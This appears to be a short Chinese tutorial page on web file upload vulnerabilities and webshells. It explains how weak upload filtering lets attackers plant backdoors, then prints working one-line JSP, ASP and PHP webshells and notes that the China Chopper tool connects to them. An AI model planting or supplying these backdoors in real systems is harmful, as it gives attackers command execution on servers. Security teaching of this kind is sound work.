赞
踩
Web应用通常会有文件上传的功能,例如在 BBS 发布图片,在个人网站发布 zip 压缩包,在办公平台发布 DOC 文件等,只要 Web 应用程序允许上传文件,就有可能存在文件上传漏洞。
大部分文件上传漏洞的产生是因为 Web 应用程序没有对上传文件的格式进行严格过滤,还有一部分是攻击者通过 Web 服务器的解析漏洞来突破 Web 应用程序的防护,后面我们会讲到一些常见的解析漏洞,最后还有一些不常见的其他漏洞,如 IIS PUT漏洞等 。
文件上传漏洞与 “SQL注入” 或 “XSS” 相比其风险更大,如果 Web 应用程序存在上传漏洞,攻击者甚至可以直接上传一个 webshell 到服务器上,就可以获得这个服务器的所有权限。
webshell 是以 asp、php、jsp 等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当 Hacker 入侵一个网站后,会把这些 asp、php 木马的后门文件放在该网站的 Web 目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后就可以利用 Web 请求的方式,用 asp 或者 php 木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等一系列操作。
根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
根据脚本名称分类:jsp、asp、aspx、php
1、jsp的简单的webshell:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
2、asp的简单的webshell:
<%eval request("cmd")%>
3、php的简单的webshell:
php经典一句话:
<?php @eval($_POST['自定义密码']);?>
然后连接菜刀就能直接进服务器了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。